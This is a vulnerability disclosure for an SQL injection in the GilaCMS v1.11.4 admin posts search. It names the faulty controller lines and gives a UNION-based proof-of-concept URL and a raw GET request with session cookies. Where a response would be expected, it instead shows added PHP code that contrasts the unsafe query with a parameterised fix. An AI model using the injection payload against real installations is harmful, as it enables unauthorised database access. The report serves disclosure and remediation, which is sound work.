I installed the latest version of GilaCMS (v1.11.4). After the administrator logs in to the website, the SQL injection vulnerability exists in the search of the content->pages->posts page.
**Vulnerability related code**
The vulnerability-related code is in lines 101 to 127 of /src/core/controllers/cm.php: the `$_GET` parameter is not filtered and is passed directly into the `getRows` function, which performs the data query on line 122, resulting in SQL injection.
**Vulnerability certificate**
Visit `http://[address]:[port]/[app_path]/cm/list_rows/post?page=1&search=qww')+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('123','456'),'789')--+THB`, and you can see that the returned content contains the result of the SQL statement execution, 123456789.
**Send GET packet**

```http
GET /cm/list_rows/post?page=1&search=qww')+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('123','456'),'789')--+THBL HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Accept: */*
Referer: http://192.168.0.103/admin/content/post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=hmrt8hmf1v09krdr1p97f0sm93; GSESSIONID=1nnplwx30uiv7aiidh8tadishur4rta71nbxsuppk7w2szo2vh
Connection: close
```
**Response package**
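The defect described in this report is a search value spliced into SQL text. The following is an added example, not GilaCMS code: the same lookup written in the vulnerable form beside a hardened form that keeps the SQL fixed and binds the user value as a parameter. The `post` table, its columns and the in-memory SQLite database are constructed for the demo; the real `getRows` function and schema are not shown on the page.

```php
<?php
// Added example (not GilaCMS code): an in-memory SQLite table stands in
// for the real posts table so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE post (id INTEGER PRIMARY KEY, title TEXT, body TEXT)");
$db->exec("INSERT INTO post (title, body) VALUES
    ('Hello world', 'first post'), ('Release notes', 'v1.11.4')");

// Vulnerable pattern (the shape the report describes): the raw query-string
// value becomes part of the SQL text, so a quote in $search closes the string
// literal and whatever follows is parsed as SQL.
function searchUnsafe(PDO $db, string $search): array
{
    $sql = "SELECT id, title FROM post WHERE title LIKE ('%" . $search . "%')";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the SQL text never changes, the value travels as a bound
// parameter, and LIKE wildcards typed by the user are escaped so they match
// literally instead of widening the search.
function searchSafe(PDO $db, string $search): array
{
    $escaped = addcslashes($search, '%_\\');
    $stmt = $db->prepare(
        "SELECT id, title FROM post WHERE title LIKE :pattern ESCAPE '\\'"
    );
    $stmt->execute([':pattern' => '%' . $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A quote-bearing term is just text to the prepared statement: it matches
// nothing and cannot alter the query. A plain term still works as expected.
print_r(searchSafe($db, "Hello') OR ('1'='1"));   // empty result set
print_r(searchSafe($db, "Hello"));                 // the 'Hello world' row
```

The same change applies to any filter taken from `$_GET` in the controller: build the statement once, bind every user-supplied value, and reject values that fail a length or character allow-list before they reach the database.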